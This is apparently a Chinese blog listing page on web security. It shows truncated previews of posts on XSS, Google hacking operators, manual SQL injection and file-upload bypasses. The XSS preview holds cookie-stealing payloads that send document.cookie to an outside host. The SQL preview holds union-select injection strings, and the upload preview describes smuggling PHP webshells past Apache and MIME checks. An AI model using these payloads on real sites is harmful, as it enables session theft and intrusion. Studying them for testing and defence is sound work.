web安全
不疯魔,不成活。
这个作者很懒,什么都没留下…
展开
-
xss总结
xss总结1.常用payload1.//配合xss后台使用<script>document.location='http://127.0.0.1?cookie=' + document.cookie</script>或<img src=x onerror=a=document.cookie;document.location='http://192.168....转载 2020-01-30 12:45:50 · 332 阅读 · 0 评论 -
google-hacking
常用表达式“xxx” 查找一个短语AND +OR |NOT -intext:intext:“xxx” ——文档中包含xxx短语intitle:intitle:“xxx” ——标题中包含xxx短语intitle:“xxx"空格"yyy”——标题中包含xxx,其他任意位置包含yyy短语intitle:“xxx”“yyy” ——标题中包含xxx,且包含yyy短语i...原创 2019-10-25 16:38:38 · 620 阅读 · 0 评论 -
SQL注入手动
一 、字符型(需要闭合特意去 ’ ’ )【1】查当前库名?id=' union select 1,group_concat(schema_name),2 from information_schema.SCHEMATA where '1'='1 或?id=' union select 1,2,database()-- 随便 --后面有个空格再随便输个字母。。。。。。...原创 2019-10-17 14:49:48 · 167 阅读 · 0 评论 -
文件上传漏洞
1.前端检测绕过【1】前端绕过,利用控制台同名函数覆盖文件检测函数2.MIME检测绕过【1】例如图片,则将brupsuite抓包修改Content-Type,例如图片mime为image/jepg3.apache漏洞【1】若上传php木马,则可将文件名改为xxx.php.rar因为apache无法解析.rar类型(也可将rar换为其他apache解析不了的类型),则会绕过rar解析ph...原创 2019-10-16 22:31:14 · 184 阅读 · 0 评论